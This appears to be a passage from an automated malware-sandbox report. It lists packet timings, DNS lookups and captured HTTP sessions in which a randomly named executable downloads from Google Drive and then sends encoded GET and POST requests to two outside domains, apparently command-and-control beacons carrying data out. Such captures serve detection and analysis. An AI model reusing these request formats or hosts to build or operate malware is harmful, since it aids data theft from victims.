                                                                                                      Mar 10, 2025 21:12:42.329260111 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.329320908 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.329359055 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.329404116 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.331610918 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.331665993 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.331732988 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.331779003 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.333970070 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.334027052 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.334065914 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.334108114 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.336282969 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.336334944 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.338047028 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.338097095 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.338102102 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.338140965 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.338144064 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.338177919 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.356448889 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.356511116 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.356533051 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.356540918 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.356553078 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.356568098 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.356597900 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.356606960 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.356642008 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.361665964 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.361715078 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.361732006 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.361737967 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.361759901 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.361785889 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.373174906 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.373244047 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.373250008 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.373287916 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.374125957 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.374170065 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.374175072 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.374212980 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.376105070 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.376149893 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.376153946 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.376192093 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.378218889 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.378283024 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.378289938 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.378330946 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.381069899 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.381108999 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.383027077 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.383071899 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.389760017 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.389825106 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.389828920 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.389868021 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.389873028 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.389909983 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.408967018 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409032106 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409037113 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409048080 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409076929 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409104109 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409115076 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409121037 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409142971 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409147978 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409171104 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409176111 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409199953 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409204960 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409228086 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409231901 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409255028 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409281015 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409857988 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409899950 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409904003 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409939051 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.409945011 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409965992 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.409996986 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.410022020 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.418493986 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.418567896 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.418574095 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.418622017 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.421247959 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.421310902 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.421314955 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.421355009 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.422065973 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.422111988 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.422125101 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.422163963 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.423216105 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.423259974 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.423266888 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.423306942 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.424499035 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.424547911 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.424552917 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.424597025 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.425848007 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.425908089 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.425913095 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.425951958 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.427139044 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.427182913 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.427191019 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.427225113 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.428154945 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.428194046 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.428236008 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.428278923 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.429135084 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.429183006 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.429187059 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.429227114 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.429238081 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.429274082 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.430214882 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.430258036 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.430262089 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.430298090 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.435837984 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.435905933 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.435942888 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.436006069 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.436194897 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.436237097 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.437025070 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.437069893 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.437094927 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.437141895 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.438057899 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.438106060 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.438123941 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.438177109 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.439595938 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.439659119 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.439663887 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.439713001 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.439732075 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.439759016 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.440397024 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.440442085 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.440449953 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.440490961 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.441560984 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.441605091 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.441610098 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.441653967 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.442385912 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.442431927 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.442437887 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.442487001 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.444472075 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.444523096 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.445983887 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.446027994 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.446034908 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.446079016 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.446131945 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.446188927 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.447082996 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.447130919 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.447135925 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.447170973 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.447865963 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.447906971 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.447915077 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.447952986 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.447957993 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.447993994 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.448945999 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.448985100 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.449018955 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:12:42.449060917 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.516233921 CET49733443192.168.2.4216.58.206.33
                                                                                                      Mar 10, 2025 21:12:42.516285896 CET44349733216.58.206.33192.168.2.4
                                                                                                      Mar 10, 2025 21:13:12.425637960 CET4973480192.168.2.413.248.169.48
                                                                                                      Mar 10, 2025 21:13:12.430510044 CET804973413.248.169.48192.168.2.4
                                                                                                      Mar 10, 2025 21:13:12.430795908 CET4973480192.168.2.413.248.169.48
                                                                                                      Mar 10, 2025 21:13:12.441447973 CET4973480192.168.2.413.248.169.48
                                                                                                      Mar 10, 2025 21:13:12.446434021 CET804973413.248.169.48192.168.2.4
                                                                                                      Mar 10, 2025 21:13:12.892055988 CET804973413.248.169.48192.168.2.4
                                                                                                      Mar 10, 2025 21:13:12.892086029 CET804973413.248.169.48192.168.2.4
                                                                                                      Mar 10, 2025 21:13:12.892291069 CET4973480192.168.2.413.248.169.48
                                                                                                      Mar 10, 2025 21:13:12.896888018 CET4973480192.168.2.413.248.169.48
                                                                                                      Mar 10, 2025 21:13:12.901731014 CET804973413.248.169.48192.168.2.4
                                                                                                      Mar 10, 2025 21:13:27.990726948 CET4973580192.168.2.484.32.84.32
                                                                                                      Mar 10, 2025 21:13:27.995767117 CET804973584.32.84.32192.168.2.4
                                                                                                      Mar 10, 2025 21:13:27.995991945 CET4973580192.168.2.484.32.84.32
                                                                                                      Mar 10, 2025 21:13:28.024139881 CET4973580192.168.2.484.32.84.32
                                                                                                      Mar 10, 2025 21:13:28.029215097 CET804973584.32.84.32192.168.2.4
                                                                                                      Mar 10, 2025 21:13:28.461844921 CET804973584.32.84.32192.168.2.4
                                                                                                      Mar 10, 2025 21:13:28.461921930 CET4973580192.168.2.484.32.84.32
                                                                                                      Mar 10, 2025 21:13:29.539524078 CET4973580192.168.2.484.32.84.32
                                                                                                      Mar 10, 2025 21:13:29.544486046 CET804973584.32.84.32192.168.2.4
                                                                                                      Mar 10, 2025 21:13:31.230792046 CET4973680192.168.2.484.32.84.32
                                                                                                      Mar 10, 2025 21:13:31.235766888 CET804973684.32.84.32192.168.2.4
                                                                                                      Mar 10, 2025 21:13:31.235894918 CET4973680192.168.2.484.32.84.32
                                                                                                      Mar 10, 2025 21:13:31.251759052 CET4973680192.168.2.484.32.84.32
                                                                                                      Mar 10, 2025 21:13:31.256644964 CET804973684.32.84.32192.168.2.4
                                                                                                      Mar 10, 2025 21:13:31.716730118 CET804973684.32.84.32192.168.2.4
                                                                                                      Mar 10, 2025 21:13:31.717075109 CET4973680192.168.2.484.32.84.32

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Mar 10, 2025 21:11:22.940246105 CET5742353192.168.2.41.1.1.1
                                                                                                      Mar 10, 2025 21:11:22.948400974 CET53574231.1.1.1192.168.2.4
                                                                                                      Mar 10, 2025 21:11:26.289551020 CET6423153192.168.2.41.1.1.1
                                                                                                      Mar 10, 2025 21:11:26.296778917 CET53642311.1.1.1192.168.2.4
                                                                                                      Mar 10, 2025 21:11:28.936700106 CET5384353192.168.2.41.1.1.1
                                                                                                      Mar 10, 2025 21:11:28.943909883 CET53538431.1.1.1192.168.2.4
                                                                                                      Mar 10, 2025 21:12:34.930984020 CET6206653192.168.2.41.1.1.1
                                                                                                      Mar 10, 2025 21:12:34.937822104 CET53620661.1.1.1192.168.2.4
                                                                                                      Mar 10, 2025 21:13:12.396863937 CET6165453192.168.2.41.1.1.1
                                                                                                      Mar 10, 2025 21:13:12.418920994 CET53616541.1.1.1192.168.2.4
                                                                                                      Mar 10, 2025 21:13:27.934007883 CET5699953192.168.2.41.1.1.1
                                                                                                      Mar 10, 2025 21:13:27.983061075 CET53569991.1.1.1192.168.2.4

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Mar 10, 2025 21:11:22.940246105 CET192.168.2.41.1.1.10xf5e4Standard query (0)Host_6637.6637.6637.657eA (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:11:26.289551020 CET192.168.2.41.1.1.10x1a72Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:11:28.936700106 CET192.168.2.41.1.1.10xaf2bStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:12:34.930984020 CET192.168.2.41.1.1.10xa0bfStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:13:12.396863937 CET192.168.2.41.1.1.10x71b7Standard query (0)www.matrixfitness.orgA (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:13:27.934007883 CET192.168.2.41.1.1.10x7d89Standard query (0)www.natividade.techA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Mar 10, 2025 21:11:21.649876118 CET1.1.1.1192.168.2.40xcb80No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:11:21.649876118 CET1.1.1.1192.168.2.40xcb80No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:11:22.948400974 CET1.1.1.1192.168.2.40xf5e4Name error (3)Host_6637.6637.6637.657enonenoneA (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:11:26.296778917 CET1.1.1.1192.168.2.40x1a72No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:11:28.943909883 CET1.1.1.1192.168.2.40xaf2bNo error (0)drive.usercontent.google.com216.58.206.33A (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:12:34.937822104 CET1.1.1.1192.168.2.40xa0bfNo error (0)drive.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:13:12.418920994 CET1.1.1.1192.168.2.40x71b7No error (0)www.matrixfitness.org13.248.169.48A (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:13:12.418920994 CET1.1.1.1192.168.2.40x71b7No error (0)www.matrixfitness.org76.223.54.146A (IP address)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:13:27.983061075 CET1.1.1.1192.168.2.40x7d89No error (0)www.natividade.technatividade.techCNAME (Canonical name)IN (0x0001)false
                                                                                                      Mar 10, 2025 21:13:27.983061075 CET1.1.1.1192.168.2.40x7d89No error (0)natividade.tech84.32.84.32A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • drive.google.com
                                                                                                      • drive.usercontent.google.com
                                                                                                      • www.matrixfitness.org
                                                                                                      • www.natividade.tech

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.44973413.248.169.48806412C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Mar 10, 2025 21:13:12.441447973 CET592OUTGET /mkxv/?_DxX9=GvGhRTQ8xnaToFmp&Sd=MK0ShD/VOT+mjwSTsaVeU6cpgDJma41hUarXaHeYlCN0x3qiLyvXgNTQnyE27cakbqtkm7ZzmuQjHRMwfybJg8/uVAzxxb2bWCipVm1F5XK7hvnY5T76PUQ= HTTP/1.1
                                                                                                      Host: www.matrixfitness.org
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36 [Pinterest/Android]
                                                                                                      Mar 10, 2025 21:13:12.892055988 CET382INHTTP/1.1 200 OK
                                                                                                      content-type: text/html
                                                                                                      date: Mon, 10 Mar 2025 20:13:12 GMT
                                                                                                      content-length: 261
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5f 44 78 58 39 3d 47 76 47 68 52 54 51 38 78 6e 61 54 6f 46 6d 70 26 53 64 3d 4d 4b 30 53 68 44 2f 56 4f 54 2b 6d 6a 77 53 54 73 61 56 65 55 36 63 70 67 44 4a 6d 61 34 31 68 55 61 72 58 61 48 65 59 6c 43 4e 30 78 33 71 69 4c 79 76 58 67 4e 54 51 6e 79 45 32 37 63 61 6b 62 71 74 6b 6d 37 5a 7a 6d 75 51 6a 48 52 4d 77 66 79 62 4a 67 38 2f 75 56 41 7a 78 78 62 32 62 57 43 69 70 56 6d 31 46 35 58 4b 37 68 76 6e 59 35 54 37 36 50 55 51 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?_DxX9=GvGhRTQ8xnaToFmp&Sd=MK0ShD/VOT+mjwSTsaVeU6cpgDJma41hUarXaHeYlCN0x3qiLyvXgNTQnyE27cakbqtkm7ZzmuQjHRMwfybJg8/uVAzxxb2bWCipVm1F5XK7hvnY5T76PUQ="}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.44973584.32.84.32806412C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Mar 10, 2025 21:13:28.024139881 CET854OUTPOST /3szq/ HTTP/1.1
                                                                                                      Host: www.natividade.tech
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Origin: http://www.natividade.tech
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Referer: http://www.natividade.tech/3szq/
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36 [Pinterest/Android]
                                                                                                      Data Raw: 53 64 3d 69 58 74 77 61 41 58 46 43 73 68 62 59 7a 62 34 58 4d 35 4e 31 43 4c 63 54 76 61 66 52 57 56 4f 64 59 48 6f 32 65 63 49 4c 35 34 6a 55 50 57 30 4f 56 5a 46 53 31 6c 74 2b 5a 32 79 63 37 4c 7a 66 41 69 39 2f 43 4f 4e 69 70 66 51 6f 30 44 67 52 67 68 67 65 2b 37 4a 51 39 32 4f 77 71 51 50 32 71 37 79 66 2f 71 76 67 64 38 53 37 2f 41 45 34 6c 72 74 6f 43 6a 5a 45 68 33 75 4c 35 73 6a 79 74 59 6c 78 6d 74 32 6e 76 65 59 68 61 4e 61 72 2b 66 4e 70 56 4a 2b 52 41 50 38 4d 31 62 45 6b 36 30 39 6d 46 70 38 50 52 6f 4a 4f 45 71 34 35 35 69 35 74 6f 2b 67 75 31 34 31 71 39 47 35 52 67 3d 3d
                                                                                                      Data Ascii: Sd=iXtwaAXFCshbYzb4XM5N1CLcTvafRWVOdYHo2ecIL54jUPW0OVZFS1lt+Z2yc7LzfAi9/CONipfQo0DgRghge+7JQ92OwqQP2q7yf/qvgd8S7/AE4lrtoCjZEh3uL5sjytYlxmt2nveYhaNar+fNpVJ+RAP8M1bEk609mFp8PRoJOEq455i5to+gu141q9G5Rg==


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      2192.168.2.44973684.32.84.3280
